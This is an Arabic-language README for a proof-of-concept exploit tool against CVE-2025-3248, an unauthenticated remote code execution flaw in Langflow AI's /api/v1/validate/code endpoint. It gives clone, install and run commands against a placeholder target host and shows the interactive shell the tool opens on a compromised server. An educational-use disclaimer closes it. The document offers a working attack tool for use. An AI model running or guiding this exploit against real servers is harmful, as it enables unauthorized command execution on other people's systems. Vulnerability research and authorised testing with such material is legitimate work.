
استغلال لتنفيذ الأكواد عن بُعد في Langflow AI (بدون مصادقة)
يستهدف هذا الاستغلال ثغرة RCE حرجة بدون مصادقة (CVE-2025-3248) في Langflow AI. تسمح الثغرة للمهاجم بتنفيذ أوامر نظام عشوائية على الخادم المستهدف عبر نقطة النهاية /api/v1/validate/code.
توفر أداة الإثبات المفاهيمي (PoC) هذه واجهة تفاعلية لاختبار وتوضيح المشكلة.
pip3 لتثبيت التبعياتgit clone https://github.com/yourusername/CVE-2025-3248.git
cd CVE-2025-3248
pip3 install -r requirements.txt
python3 CVE-2025-3248.py -u http://TARGET_HOST:PORT
python3 CVE-2025-3248.py -u http://127.0.0.1:7860
سيتم عرض واجهة شل تفاعلية:
0xgh057r3c0n@root💀$ whoami
langflow
0xgh057r3c0n@root💀$ uname -a
Linux ubuntu 5.15.0-89-generic #99~20.04.1-Ubuntu SMP ...
exit أو quitهذا المشروع مرخص بموجب رخصة MIT — راجع ملف LICENSE للتفاصيل.
يتم توفير هذا البرنامج للأغراض التعليمية والبحثية فقط. لا يتحمل المؤلف أي مسؤولية عن أي استخدام خاطئ لهذا الكود. استخدم فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.